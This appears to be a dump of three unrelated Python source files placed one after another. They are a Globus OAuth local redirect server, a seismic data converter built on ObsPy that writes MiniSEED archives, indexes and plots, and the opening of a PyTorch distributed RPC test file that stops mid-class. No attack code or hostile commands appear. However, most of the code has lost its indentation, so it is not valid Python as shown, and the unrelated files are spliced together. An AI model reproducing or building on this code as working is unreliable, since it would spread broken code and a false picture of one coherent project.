local_server.py
import logging
import threading
from contextlib import contextmanager
import string
import six
from six.moves import queue
from six.moves.urllib.parse import parse_qsl, urlparse, urlunparse
try:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
except ImportError:
from http.server import HTTPServer, BaseHTTPRequestHandler
from fair_research_login.exc import LocalServerError
from fair_research_login.code_handler import CodeHandler
log = logging.getLogger(__name__)
HTML_TEMPLATE = """
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<title>$app_name Login</title>
<style type="text/css" media="screen">
html { font: 75% "Helvetica Neue","Arial","Helvetica",sans-serif }
html, body { display: block; margin: 0; padding: 0 }
a { color: #5783a6; text-decoration: none; }
a img { border: none; }
header { background: #2e5793; }
main { padding: 25px 0 50px; }
main h1 { border-bottom: solid 1px #aaa; font-size: 233.33%;
font-weight: normal; }
main img { display: block; margin: 0 auto; max-width: 100%; height: auto; }
main p { color: #333; font-size: 116.67%; max-width: 560px;
margin: 1em auto; line-height: 150%; }
header > div, main, footer { display: block; max-width: 980px;
margin: 0 auto; }
</style>
</head>
<body>
<header><div><a href="https://www.globus.org" title="Go to Globus.org Home">
<img alt="Globus" width="215" height="64"
src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANcAAABACAQAAAAjFyrFAAAPM0lEQVR42u2caXhTx7nH/5IlWRuy5QXvGLCN5Q0L2RCWQIB7SW6229InJHAJJG0ohJaQtA1NaC5cSiE3TcIS2pQEAiW0hSwWW0IgvcQhLAWSFBLAxqEJBq8xlrGEbMvS0Tnv/SDJ0pF1hGxEn7o9837xM885M2fmN/POu4wMgigDR8QpEHGJIuISRcQl4hJFxCWKiGtg4gouvAekzGTmeXclV08uInKxV5nTnZvbH30vCdJ+dylQRBg3hyueWc41UsjCOTorqsdCBomI6x8Bl5RdxFkpfOGum/fm9h2ZiCvKuDrTuUqKqLitVQ9D2TdgIq6o4nIWcleoD6V2BTR9OclEXFHE1Z3HNVMfy9e/gjZyYCKuqOEiLVdDfS/sscegiVQliriihovdTv0qjPXZUVCKuP6uuJip4aFY/1a95/NtX+2+Vk1E5LJ1tnR96xHimvYjGTIR198RF3dKGFVH468XYxxKs4rvHgXDH3/Q3br/fzEeZRj1u0c+W8e6iGvc2bqy7YEvMm50iom4ooKLmRAGVsO/fRfGkuHXt5OLyHXl1LwNd1b+BDlIrvt+8LPOU1d/PCeMrSjiigou92Zhh3jVIhiR0v27ngp25/T0LMRD7jaHesF1ufq7UIQ2PkRcUcHF1QnRajiBscj8fAgx/jrLcWRCBSlzVAhx08uh/TERVxRwObKFVeGO5SiCjvkpjwYz1gQtQRAXEV3ZgEG9gYm4ooCLuVN42sf9B4ZA4d7Fr103B4mQhMNF9HEIf6wvuCJ9jttEBC3k/ZgCcm2FBjFRnNJbuBT9u+sxoSl3WDAGyZCy1fz6t5YgFTHhcTmaS4Yj9tbjYrYQIQ+6/uCyvoWhUA0wXN1PCXpb38AEPYFr59fvW45MyMPjIjr+P78d4XjE+ZLrD84tncuap8xQQHKLcJmQ2B9cFjMKoRlguDp/EAZXKeIInI1ff3A1hkBxI1zuDmJ5NuOlph8iFlIR103huj5daMI7m7242vj1u5Yj+8a4QhXb/idTECPiuglczUWCThdrHI94AnOOX//yfGTxcVmqdq54Zu6iGZt/XPUHZ1s4YNdPTE6FTMTVb1yTZcHKzl/+tAhJkDq28YLwTNFUpEEWiOvtlSjDMKQhFZljShv2hQNW9yb0/B0m4uoDLki6BKe37gCyoGi+l+c6n0Q535Dn2DvvwzBoIEMM5FAjuXVvuKsDW++DJtDsEB46k+N+kTtNROT+wvn7ptshZzfzDffQuNzT2AquloiIvczsbr0/ZJzFi4tbwH7EtRNx7czh9rmIDfQXw7gJvdyAnnZqmcP2xb5TOvq48O0swZllnr8Hg6DoOuzfW8/NRwG0BOdBX13zZxiNZP8wEfNclrudiKjr6t8OfL6t6u1rFwJbbfwQaYEKUQgXt4CIqOODli3NW21/Zm1Ebasdb/IN99643OXcX4k4q/2g/z3m7NeTeyEji3nrXVwtEXO25Y269W0VTD2R86g5259fCOMm8N0APXeIyHm0dbOvHebsjmGQ3xJcK7TuRsGzpubuHCheGdJ+iIio89tNS+fdc3oulJA43/c9s+VZFGIQr/GYa6+7Wt5dqZyIUShAHvLffKSrpw+2u6gUmhvhYh8k6tz/xCSMQhEMMKCwrYKItRGh3I8nGBf7INfOXj73U4xCqfe9oi+fdjWwtvr5UPMiLWQ/xdpc5w7OgBElMCAfhRdXEjnPb8rz7acwqpanStnNRJ99H0YUIx8jUPDl0xYzcqDtz32xG+KCtHlRmJh81YHboULizNtm3626bdFd3V9VPwYdZD5cbTWy8ciEgt981aiFZSjCUCRACzU0iF9i7G7ytblhLhL86jDkB+q5duYsTChCGnTQQAMdUuwHiYhwmxAudznX7jy6eCJKMQxJPe8l/dLYcZK1nbgX6oAJJCJn44J/RwmGQA8N1NAi6eITRC1bkOhRc5Hi4todx1GGnJ52EjEEGVDfkt3FTGCOhbW/uY6Pr62u+1nDauu7XBfRkYVIgcKDi+NWPI5ixPUKOMkwCHFQ+tYzJIj94mFfg+afI81vboT6PPdSouPzMRLJAWoz5oSJiAjjhHBxhzjr4okoRoq/ZwKkUG4cwdo6TiI94BwiosOrUIZUv5qEFFrHMaLnyj0gIsVFZPszjAFLUAoFYhETdVykYNf31Xva8zQyoXBVEhGd2IYxvElADx5pMMKhSpc39r9jCTIhD4eL/YizohzZUAQqTcjdV4RxucuJGtfAiNQQ3yNvX0V0cEbAwiL3dUzBcP7VBUgtjxKd+bnnLI4UF3OYaN8s6HvHbaKKixTce313dt94EpmQM58S1R8eNBE5kV6ugaTLGyxev+BGuLjazhMwIYlvQULi3COsDN1LifbMxojQxnnT7USXNyC9x5Ag+6cYG2gieZ8zEDVtQzYUkeOqKWZtRG2v1RRDxkcWVVzshvBgLNUNxxuPWb/i1z7zX8gok3PXLJWpd8CAuEivrgGOP3paYOwnHofaN7DQXlFbBUZCFzx05++FTQ33G0QoQ0bomyOQEVnMyO3ZTdS6C8beVh9iiCxm5EMdOS7IX81vqyAich6xPRkYaosiLpeJuPC4PngZt6FkwwOBdV0tg8YhxT7FvimhCPnQR56CAOwre3pkz/zIB0zQiS2CNhiXayt/AgMn1Pt3skAuW0JkMaPAf95YzCiGVuC5Qmj6gEsCBZJ/MfrKK64GIs5qWwlV1P0u99Ybqb1rF/QlSILu6hu+GqZz7U9Qgrj6DOiQivi+5IsAxB6d5e7whoC71oyHEhKBs+tyx8lQuJhdwrgcy4j2zBbC5S4nurwhEJf9VChcTI7/OSFc7vLeMRHIoEEKct+f2XGSqHM/4qNsaggn/QNc2r0zMiCD5sCsmu0XKj5eP+0eGJEGhc/26WOQRgrNxw/52r78DgZDJhBc2s3aUNJbGXK1wsqwroCoaRsyQycr3S8SvfqfyPErQ/f1UMqQeYjok4XIg0oYF7uZ6Oru4BAWgBiooEdWw1qimsXQ9f/HVSFwhcLT9lXlb1fMe+C+VXOqtttqOI7I2Xz1+aqJs1KQjhzkIhuJiIXEI/2IqUmgsnnjIY4W5An5JrY5RBd/heTAhItn5QubGpA5j7C27dNCuadMDtfe9ReYkOY3NYjOv9Db1GA/4qwwIQtygnMN0cb7g/er5yua94XA5RmhHHoiixlDgr3RKOP6607ZRJRiONKRggzkDi//5Ywd844sPDO7aupCPdRQ9XVHhRpOW8/dDxgRJxDVULivuBqWm6AKxMVWhPO7IDk7krW5GtYW9pomPXeJs268H4XQ+Q15ImfTchM/n8wtIKpfh1IkQkKwP0x0YTXSeWPWc5ecR4ia3wsw5HMgCbQIbXlETds85krUcLENfFj2K7JJyEcClJAhBjKooEMiUpCCROigvNl7Db5if9x7enWjHHoBXNKLU1gbU3/6LsT6JoLbRNRdxcflXEP0yUIM9kCA/OsHWRtT
37IEKv+u4RZwlzjr8flBHhnZP3XbXQ2eHrxPPkvkjU+oPIuGs7qvV073uyrsg9wl9vLPxgXuLu5ZIvuKygyf4096toLIPMejUKOGy/E2H1ftRzD5wi8B7m4MZJBDjpibjYD5ius3XjfhHEyIFwzxKmpmsjYi51HHOscyt5lrJ6p+6upuIozx47pUyFldDW2v1U+EHBJIoDx1j6OaiLM69zrWOdcwu7h2Ite5fbNgRBbvF2nUuuuFWa4Gfg/2Az+aggLoPbAhbZjO2ogcx7xP1BI5jj01AYWBZ1fN4O59RESuT/zt1K2HKVT44CZwNQXlka01KOaHaqMr3rWn4Lyxww/XogiDBHFJoHqxuG69o5q1ETF17e+8fi9Gtr9DhDI/LsjOTus4SVSzGHrICJBAhfQT8yxmpp7I897x+TChCOlQ8RYcWcwwIbdhra8H+8GjC2CCAUl+zw2x74+3mF0NAW2VwoDkQMsQMdBXTreY/e3smQ0Thkf+25yIcBUpus/ygW15FPHR6yI0Lva/fVcLMicjG7EIZ5YokYwcFGEkSlGCEUh17uXbapBAiTQUwOD7YQUkUCAeWTBgJIwwYiQMyEJ8cAIFOuRhKHRIwHBvDyNRgCzoAt1sSKBEKvJRCiNKUYJ8ZCIOMsQhz59AgQw6ZCAfJd52DMiABtLoRjUkZyZzDO+6WeMSY/B1s+jiYiaRy5PSfPlJjIReaEj+sC5U0CEBCYiHBjL3me4qmJDAm1A5P5zsrdMgHolIRDw0kPdehJBDCw1iIIWypwdt70QmJJD1bsv3dlCPcT1fKg8TAugnLkBeuzTofmD9vjuE7rjfPC5mAnkvGnywHmOQ4QnghsWFYEO+rcJz4ecfT2598l8Cde2vgzPIra/tHhrN2609juoPyeHpYd9LGIuh4YJQoYfOHSIyz4EhmjcsBhIuQArtl0+zziBk7s79lkXflMwPVCKxXZl9d417DO4i7kPfmfXCExiNbI9uF8ZFevfSmsEBWTE9d4iofh3KomlxDTRcgBTazVOtp0PGoBi2njnHnGPOcy1ERMyF9mVVhX016ZlJ7nc9oV3WeWZH8Z0oRQbU4aPWgHup3zh2rnFXEhHVr0N55Ambf05cgBQqddqHi20XIst3uWrsG1tnVg3pnYAMEjUzjVnLXfI6xdfP7njgeyhHLhKhiOAmlPybGS1bPMYxa3Oeb9my8X6YkBPNSNzAxOWxa+KQ9epDNX/qiPh/a7Dfuj5xvG5fZpt7/b5rE6xlnaZOk/2Ozu90z3eucu1kq3y/CnO11n/w9jNZk2BCLgZDHXyPV2DoUmiRgXwUe43jYuQh1a9CB0a5Nbg8yBSIQxryZk3d8dSJV6rfqj3QeKTx2KWDF8wnN5lXHFxde6CzoQ9JZ85R27T/5EsrZmI0jDAgCwlQIyayBHnPIlIjDglIRALioA7O1f4r4/L5GCrEIRmZGIY8GFCAQhgwAsORjWEwTL799QX/t+rLbVcOXavuqHNa3A4fHbfd1Wq/2Hay8cD5zYeWvzJn4h0woRQGDEMq9NBAIbQvIlUsA7HcQlwIPM3kUEINDbTQQgM1lIiFEhrEIQnpyEYuClACI0wox2ivlGEUSlEMA3KRjTQkIQ4aKEPtqFsxpH9m6f8KlkKGWKiggQ5xiIceCV7RIx46DIIGKigiV1wijIhwiSLiEkXEJYo4BSIuUURcooi4Bpr8P1XUcWL+V5XVAAAAAElFTkSuQmCC">
</a></div></header>
<main>
<h1>$app_name</h1>
<p>
$login_result. You may close this tab.
</p>
<p>
$error
</p>
<p>
$post_login_message
</p>
</main>
</body>
</html>
"""
DEFAULT_VARS = {
'defaults': {
'app_name': '',
'login_result': '',
'post_login_message': '',
'error': '',
},
'success': {
'login_result': 'Login Successful',
},
'error': {
'login_result': 'Login Failed',
}
}
class LocalServerCodeHandler(CodeHandler):
def __init__(self, template=None, template_vars=None,
hostname='localhost', cli_message=None):
super(LocalServerCodeHandler, self).__init__()
self._server = None
self.hostname = hostname
self.template = string.Template(template or HTML_TEMPLATE)
self.template_vars = template_vars or DEFAULT_VARS
default_message = ('Starting login with Globus Auth, '
'press ^C to cancel.')
self.cli_message = cli_message or default_message
self.no_local_server = False
def is_available(self):
local = self.is_remote_session() is False
enabled = self.no_local_server is False
log.debug('Local Server: Local: {} Enabled: {}'.format(local, enabled))
return local and enabled
def set_context(self, *args, **kwargs):
super(LocalServerCodeHandler, self).set_context(*args, **kwargs)
if not self.template_vars.get('defaults', {}).get('app_name'):
self.template_vars['defaults']['app_name'] = self.app_name
self.no_local_server = (kwargs.get('no_local_server') or
self.no_local_server)
@property
def server(self):
if self._server is None:
raise LocalServerError('server referenced before start() called!')
else:
return self._server
@contextmanager
def start(self):
self._server = RedirectHTTPServer(self.template, self.template_vars)
thread = threading.Thread(target=self.server.serve_forever)
thread.daemon = True
thread.start()
self.write_message(self.cli_message)
yield
self._server.shutdown()
del self._server
def get_redirect_uri(self):
_, port = self.server.server_address
host = '{}:{}'.format(self.hostname, port)
return urlunparse(('http', host, '', None, None, None))
def get_code(self):
return self.server.wait_for_code()
class RedirectHandler(BaseHTTPRequestHandler):
def do_GET(self): # noqa
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
query_params = dict(parse_qsl(urlparse(self.path).query))
code = query_params.get('code')
error = query_params.get('error_description',
query_params.get('error'))
resp = self.server.success() if code else self.server.error()
self.wfile.write(resp)
self.server.return_code(code or LocalServerError(error))
def log_message(self, format, *args):
return
class RedirectHTTPServer(HTTPServer, object):
DEFAULT_LISTEN = ('0.0.0.0', 0)
DEFAULT_HANDLER = RedirectHandler
VARS_KEYS = {'success', 'error'}
def __init__(self, template, vars, listen=None, handler_class=None,
timeout=3600):
HTTPServer.__init__(
self,
listen or RedirectHTTPServer.DEFAULT_LISTEN,
handler_class or RedirectHTTPServer.DEFAULT_HANDLER
)
self._auth_code_queue = queue.Queue()
self.template = template
self.vars = vars
self.timeout = timeout
if not self.VARS_KEYS.issubset(set(vars.keys())):
raise ValueError('Vars must contain two dicts: {}'
''.format(self.VARS_KEYS))
for key in self.VARS_KEYS:
self.template_test(key)
def template_test(self, key):
try:
self.render_template(key)
except KeyError as ke:
raise KeyError('"{}" template var "{}" was not provided'
''.format(key, ','.join(ke.args)))
def success(self):
return self.render_template('success')
def error(self):
return self.render_template('error')
def render_template(self, key):
tvars = self.vars.get('defaults', {})
tvars.update(self.vars[key])
return six.b(self.template.substitute(tvars))
def return_code(self, code):
self._auth_code_queue.put_nowait(code)
def wait_for_code(self):
# workaround for handling control-c interrupt.
# relevant Python issue discussing this behavior:
# https://bugs.python.org/issue1360
try:
resp = self._auth_code_queue.get(block=True, timeout=self.timeout)
if isinstance(resp, LocalServerError):
raise resp
return resp
except queue.Empty:
raise LocalServerError()
finally:
# shutdown() stops the server thread
# https://github.com/python/cpython/blob/3.7/Lib/socketserver.py#L241
self.shutdown()
# server_close() closes the socket:
# https://github.com/python/cpython/blob/3.7/Lib/socketserver.py#L474
self.server_close()
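# --- Illustrative usage sketch (not part of the original module) -------------
# A minimal sketch of how the handler above is driven, assuming the parent
# CodeHandler provides is_remote_session()/write_message() and that the rest
# of the OAuth flow (building the authorize URL from the redirect URI and
# exchanging the returned code) lives elsewhere in the package.
if __name__ == '__main__':
    handler = LocalServerCodeHandler()
    if handler.is_available():
        with handler.start():
            # The redirect URI points at the ephemeral local port,
            # e.g. http://localhost:<port>
            print('Redirect URI:', handler.get_redirect_uri())
            # Blocks until the browser is redirected back with ?code=...,
            # or raises LocalServerError on ?error=... or timeout.
            print('Auth code:', handler.get_code())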
main.py
import glob
import json
import datetime
import multiprocessing
import os
import concurrent.futures
import numpy as np
import pandas as pd
import matplotlib
# Select a non-interactive backend before pyplot is imported.
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from obspy import Stream, Trace, read, UTCDateTime
from models.sds_index import SdsIndex
from multiprocessing import Pool
class Configuration:
    '''
    Reads the configuration file.
    Make sure the location of config.json is correct.
    '''
def __init__(self, default=None, location='config.json'):
self.default = default
self.location = location
def set_location(self, location):
self.location = location
return self
def get_location(self):
return self.location
def check_directory(self, directory):
if not os.path.exists(directory):
os.makedirs(directory)
return self
def get(self):
with open(self.get_location()) as file_config:
load_config = json.load(file_config)
get_config = load_config['default']
start_date = datetime.datetime.strptime(load_config['type'][get_config]['start_date'],'%Y-%m-%d')
end_date = datetime.datetime.strptime(load_config['type'][get_config]['end_date'],'%Y-%m-%d')
output_directory = load_config['output_directory']
save_to_database = load_config['save_to_database']
cpu_used = load_config['cpu_used']
config = {
'default' : get_config,
'cpu_used': cpu_used,
'save_to_database': save_to_database,
'input_directory' : load_config['type'][get_config]['input_directory'],
'start_date' : start_date,
'end_date' : end_date,
'output_directory' : output_directory,
'index_directory' : os.path.join(output_directory, 'Index'),
'converted_directory' : os.path.join(output_directory, 'Converted'),
'dayplot_directory' : os.path.join(output_directory, 'Dayplots'),
'spectogram_directory' : os.path.join(output_directory, 'Spectogram'),
'channels' : load_config['type'][get_config]['channels'] if get_config == 'sac' else [],
'type': load_config['type']
}
self.check_directory(config['output_directory'])
self.check_directory(config['index_directory'])
self.check_directory(config['converted_directory'])
self.check_directory(config['dayplot_directory'])
self.check_directory(config['spectogram_directory'])
return config
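# --- Illustrative config.json layout (an assumption inferred from get() above,
# not a file shipped with the project). Paths, dates and station names are
# placeholders; a 'sac' entry would also need a 'channels' list, and a
# 'win_sinabung' entry a 'stations' mapping of raw channel codes.
EXAMPLE_CONFIG = {
    "default": "sds",
    "cpu_used": 4,
    "save_to_database": False,
    "output_directory": "output",
    "type": {
        "sds": {
            "input_directory": "/data/sds_archive",
            "start_date": "2021-01-01",
            "end_date": "2021-01-31",
            "stations": ["STA01", "STA02"]
        }
    }
}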
class Files:
    ''' Gets all files matching the search configuration '''
def __init__(self):
self.config = Configuration().get()
def search_default(self, date):
input_directory = self.config['input_directory']
try:
stream = read(os.path.join(input_directory, date.strftime('%Y-%m-%d')+'*'))
for trace in stream:
if trace.stats.sampling_rate < 50.0:
stream.remove(trace)
stream.merge(fill_value=0)
return stream
except Exception as e:
print(e)
def search_idds(self, date):
input_directory = self.config['input_directory']
year = date.strftime('%Y')
julian_day = date.strftime('%j')
try:
stream = read(os.path.join(input_directory, year,
'VG', '*', '*', '*', '*'+julian_day+'*'))
for trace in stream:
if trace.stats.sampling_rate < 50.0:
stream.remove(trace)
stream.merge(fill_value=0)
return stream
except Exception as e:
print(e)
def search_sac(self, date):
search_list = []
stream_list = []
input_directory = self.config['input_directory']
start_date = self.config['start_date']
end_date = self.config['end_date']
channels = self.config['channels']
print('Searching files....')
for n in range(int((end_date-start_date).days)+1):
filter = start_date+datetime.timedelta(n)
for root, folders, _ in os.walk(input_directory):
for folder in folders:
if filter.strftime('%Y%m%d') in folder:
channel_folder = os.path.join(root, folder)
for channel in channels:
channel_files = [f for f in glob.glob(os.path.join(channel_folder, channel+'*'), recursive=False)]
for channel_file in channel_files:
search_list.append(channel_file)
stream_list.append(NewStream().get(search_list))
return stream_list
def search_itb(self, date):
input_directory = os.path.join(self.config['input_directory'], date.strftime('%y%m%d'))
new_stream = Stream()
for root, _, files in os.walk(input_directory):
for stream in [f for f in files if f.endswith('.mseed') or f.endswith('.sac')]:
try:
read_stream = read(os.path.join(root, stream))
for trace in read_stream:
if trace.stats.sampling_rate < 50.0:
read_stream.remove(trace)
new_stream+=read_stream
except:
print('Error : '+stream)
new_stream.merge(fill_value=0)
return new_stream
def search_win_sinabung(self, date):
year_month = date.strftime('%y%m')
year_month_day = date.strftime('%y%m%d')
input_directory = os.path.join(self.config['input_directory'], year_month, year_month_day)
print('==== Reading ALL one minute files ====')
streams = read(os.path.join(input_directory, '*','*'))
stream = streams.merge(fill_value=0)
return stream
def search_sds(self, date):
config = self.config['type']['sds']
year = date.strftime('%Y')
julian_day = date.strftime('%j')
new_stream = Stream()
for station in self.config['type']['sds']['stations']:
filename = 'VG.'+station.upper()+'.00.EHZ.D.'+year+'.'+julian_day
stream = os.path.join(self.config['input_directory'],year,'VG',station.upper(),'EHZ.D',filename)
if os.path.exists(stream):
stream = read(stream)
new_stream+=stream
return new_stream
def get(self, date, search='default'):
if search == 'default':
return self.search_default(date)
if search == 'idds':
return self.search_idds(date)
if search == 'sac':
return self.search_sac(date)
if search == 'itb':
return self.search_itb(date)
if search == 'win_sinabung':
return self.search_win_sinabung(date)
if search == 'sds':
return self.search_sds(date)
return "Konfigurasi pencarian tidak ditemukan"
def save(self, trace):
pass
class NewStream:
def __init__(self):
pass
    def get(self, files):
        '''Read each file path in files and collect every readable trace into one Stream.'''
        list_traces = []
        for file in files:
            try:
                read_stream = read(file)
            except Exception:
                # Skip files that ObsPy cannot read.
                continue
            list_traces.extend(read_stream.traces)
        return Stream(list_traces)
class NewTrace:
def __init__(self, config):
self.config = config
def get_channel(self, trace):
if 'Z' in trace.stats.location:
return 'EHZ'
if 'Z' in trace.stats.channel:
return 'EHZ'
if 'N' in trace.stats.channel:
return 'EHN'
if 'E' in trace.stats.channel:
return 'EHE'
if self.config['default'] == 'win_sinabung':
stations = self.config['type']['win_sinabung']['stations']
return stations[trace.stats.channel]['channel']
def get_station(self, trace):
if trace.stats.station:
return trace.stats.station
if self.config['default'] == 'win_sinabung':
stations = dict(self.config['type']['win_sinabung']['stations'])
if trace.stats.channel in stations:
return stations[trace.stats.channel]['station']
return trace.stats.channel
def get(self, trace):
trace.data = np.require(trace.data, dtype=np.int32)
trace.stats['station'] = self.get_station(trace).upper()
trace.stats['network'] = 'VG'
trace.stats['channel'] = self.get_channel(trace)
trace.stats['location'] = '00'
return trace
class Convert:
def __init__(self, location='config.json', save_to_database=False, save_to_csv=False, save_dayplot=False, save_spectogram=False):
self.save_index = save_to_database
self.save_csv = save_to_csv
self.save_dayplot = save_dayplot
self.save_spectogram = save_spectogram
        self.config = Configuration(location=location).get()
self.search = self.config['default']
self.cpu_used = self.config['cpu_used'] if self.config['cpu_used'] < multiprocessing.cpu_count() else int(multiprocessing.cpu_count()/2)
self.index_directory = self.config['index_directory']
self.output = self.config['converted_directory']
self.dayplot_directory = self.config['dayplot_directory']
self.spectogram_directory = self.config['spectogram_directory']
def date_range(self):
start_date = self.config['start_date']
end_date = self.config['end_date']
for n in range(int((end_date-start_date).days)+1):
yield start_date+datetime.timedelta(n)
def to_mseed(self):
print('Reading configuration....')
if self.cpu_used > 1:
print('=== USE multiprocessing ===')
# threads = []
# for date in self.date_range():
# thread = threading.Thread(target=self._to_mseed, args=(date,))
# thread.start()
# threads.append(thread)
# for thread in threads:
# thread.join()
with concurrent.futures.ProcessPoolExecutor(max_workers=int(self.cpu_used)) as executor:
executor.map(self._to_mseed, self.date_range())
# with Pool(self.cpu_used) as pool:
# [pool.apply_async(self._to_mseed, (date, )) for date in self.date_range()]
# pool.map(self._to_mseed, self.date_range())
# pool.close()
# pool.join()
else:
print('USE single processing')
for date in self.date_range():
print(date)
self._to_mseed(date)
def _to_mseed(self, date):
stream = Files().get(date=date, search=self.search)
if len(stream) > 0:
self.save(stream,date)
def save(self,stream, date):
for tr in stream:
new_trace = NewTrace(self.config).get(tr)
if new_trace.stats.sampling_rate >= 50.0:
print(new_trace)
path = SDS().save(self.output,new_trace)
if self.save_index:
SaveIndex().save(path, new_trace, date, db=True)
if self.save_csv==True:
SaveIndex().save(path, new_trace, date, csv=True, index_directory=self.index_directory)
if self.save_dayplot==True:
Plot().save(trace=new_trace, save_dayplot=True, dayplot_directory=self.dayplot_directory)
if self.save_spectogram==True:
Plot().save(trace=new_trace, save_spectogram=True, spectogram_directory=self.spectogram_directory)
else:
print('Skipped '+date.strftime('%Y-%m-%d'))
print(':: '+date.strftime('%Y-%m-%d')+' DONE!!')
class SDS:
def __init__(self):
pass
def check_directory(self, directory):
if not os.path.exists(directory):
os.makedirs(directory)
return self
def file_not_exists(self, file):
return not os.path.exists(file)
def get_directory(self, output, trace):
structure = {
'year' : trace.stats.starttime.strftime('%Y'),
'julian_day' : trace.stats.starttime.strftime('%j'),
'station' : trace.stats.station,
'channel' : trace.stats.channel,
'type' : 'D',
'network': trace.stats.network,
'location': trace.stats.location
}
filename = '.'.join([
structure['network'],
structure['station'],
structure['location'],
structure['channel'],
structure['type'],
structure['year'],
structure['julian_day']
])
path = os.path.join(
'SDS',
structure['year'],
structure['network'],
structure['station'],
structure['channel']+'.'+structure['type']
)
self.check_directory(os.path.join(output,path))
full_path = os.path.join(output,path,filename)
return filename, path, full_path
def save(self, output, trace=Trace):
filename, path, full_path = self.get_directory(output, trace)
print('>> Output : '+full_path)
if self.file_not_exists(full_path):
try:
trace.write(full_path, format='MSEED', encoding='STEIM2')
except:
trace.data = trace.data.clip(-2e30, 2e30)
trace.write(full_path, format='MSEED', encoding='STEIM2')
return os.path.join(path,filename)
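# --- Worked example of the layout produced by get_directory()/save() ---------
# (station code and date are placeholders, for orientation only)
#   trace: network=VG, station=STA01, location=00, channel=EHZ,
#          starttime=2021-01-15 (Julian day 015)
#   filename : VG.STA01.00.EHZ.D.2021.015
#   path     : SDS/2021/VG/STA01/EHZ.D
#   full_path: <output>/SDS/2021/VG/STA01/EHZ.D/VG.STA01.00.EHZ.D.2021.015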
class SaveIndex:
def __init__(self):
pass
def get_scnl(self,trace):
scnl = trace.stats.station+'_'+trace.stats.channel+'_'+trace.stats.network+'_'+trace.stats.location
return scnl
def get_sampling_rate(self,trace):
return float(round(trace.stats.sampling_rate, 2))
def get_availability(self,trace):
availability = float(round(trace.stats.npts/(trace.stats.sampling_rate*3600*24)*100,2))
return availability
def get_filesize(self,filename):
file_mseed = os.path.join(Configuration().get()['converted_directory'], filename)
trace = read(file_mseed)[0]
return trace.stats.mseed.filesize
def save(self, filename, trace, date, db=False, csv=False, index_directory=None):
attributes = {
'scnl':self.get_scnl(trace),
'date':date,
}
values = {
'filename':filename,
'sampling_rate':self.get_sampling_rate(trace),
'max_amplitude':float(abs(trace.max())),
'availability':self.get_availability(trace),
'filesize':self.get_filesize(filename)
}
if db:
SdsIndex.update_or_create(attributes=attributes, values=values)
if csv:
df = {
'scnl' : [attributes['scnl']],
'date' : [attributes['date']],
'sampling_rate' : [values['sampling_rate']],
'max_amplitude' : [values['max_amplitude']],
'availability' : [values['availability']],
'filesize' : [values['filesize']],
}
df = pd.DataFrame(df)
file_csv = os.path.join(index_directory,attributes['scnl']+'.csv')
if not os.path.isfile(file_csv):
df.to_csv(file_csv, header=['scnl','date','sampling_rate','max_amplitude','availability','filesize'], index=False, date_format='%Y-%m-%d')
else:
df.to_csv(file_csv, mode='a', header=False, index=False, date_format='%Y-%m-%d')
class Plot:
def __init__(self):
pass
def set_time(self, trace):
date = trace.stats.starttime.strftime('%Y-%m-%d')
starttime = UTCDateTime(date+'T00:00:00.000000Z')
endtime = UTCDateTime(date+'T23:59:59.990000Z')
return starttime, endtime
def save(self, trace, save_dayplot=False, dayplot_directory=None, save_spectogram=False, spectogram_directory=None):
judul = trace.stats.starttime.strftime('%Y-%m-%d')+' | '+trace.id+' | '+str(trace.stats.sampling_rate)+' Hz | '+str(trace.stats.npts)+' samples'
if save_dayplot == True:
_, _, full_path = SDS().get_directory(dayplot_directory, trace)
trace.plot(
type='dayplot',
interval=60,
one_tick_per_line=True,
color=['k'],
outfile= '{}.png'.format(full_path),
number_of_ticks=13,
size=(1200,900),
title=judul
)
plt.close('all')
if save_spectogram == True:
_, _, full_path = SDS().get_directory(spectogram_directory, trace)
trace.spectrogram(
outfile='{}.png'.format(full_path),
title=judul,
show=False,
fmt='png'
)
plt.close('all')
def main():
print("Jumlah CPU : ", multiprocessing.cpu_count())
Convert(save_to_csv=True, save_dayplot=True, save_spectogram=False).to_mseed()
if __name__ == '__main__':
main()
rpc_test.py
import concurrent.futures
import contextlib
import json
import os
import sys
import threading
import time
from collections import namedtuple
from functools import partial
from threading import Event
from threading import Lock
from unittest import mock
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.distributed.rpc as rpc
import torch.distributed.autograd as dist_autograd
from torch.distributed.rpc import RRef, _get_debug_info, _rref_context_get_debug_info, WorkerInfo
from torch.distributed.rpc.api import _delete_all_user_and_unforked_owner_rrefs, _use_rpc_pickler, _thread_local_var, _wait_all
from torch.distributed.rpc.internal import (
PythonUDF,
RPCExecMode,
_internal_rpc_pickler,
_build_rpc_profiling_key,
)
from torch.futures import Future
from torch.testing._internal.common_distributed import (
skip_if_lt_x_gpu,
captured_output,
)
from torch.testing._internal.common_utils import (
IS_MACOS,
load_tests,
sandcastle_skip_if,
get_cycles_per_ms,
)
from torch.testing._internal.dist_utils import (
dist_init,
get_function_event,
initialize_pg,
wait_until_node_failure,
wait_until_pending_futures_and_users_flushed,
wait_until_owners_and_forks_on_rank,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_utils import TemporaryFileName
from torch.autograd.profiler_legacy import profile as _profile
def foo_add():
return torch.add(torch.ones(1), torch.ones(1))
def udf_with_torch_ops(device=-1, use_record_function=False):
device_ctx = contextlib.suppress() if device == -1 else torch.cuda.device(device)
record_function_ctx = (
torch.autograd.profiler.record_function("##forward##")
if use_record_function
else contextlib.suppress()
)
with device_ctx, record_function_ctx:
t1, t2 = torch.ones(1), torch.ones(1)
t = torch.add(t1, t2)
t = torch.mul(t, t)
t = t.relu()
t = t.sigmoid()
# Events (operator invocations) that are expected to be run as part of the
# above function.
EXPECTED_REMOTE_EVENTS = [
"aten::ones",
"aten::ones",
"aten::add",
"aten::mul",
"aten::relu",
"aten::clamp_min",
"aten::sigmoid",
]
# Remote operations are prefixed with the following string for RPC profiling.
REMOTE_OP_STR = "#remote_op: "
VALUE_FUTURE = concurrent.futures.Future()
DONE_FUTURE = concurrent.futures.Future()
FIFTY_MIL_CYCLES = 50000000
_rpc_barrier_count = 0
def _increment_count():
global _rpc_barrier_count
_rpc_barrier_count += 1
def _reset_count():
global _rpc_barrier_count
_rpc_barrier_count = 0
class StubRpcAgent:
def __init__(self, world_size):
self.world_size = world_size
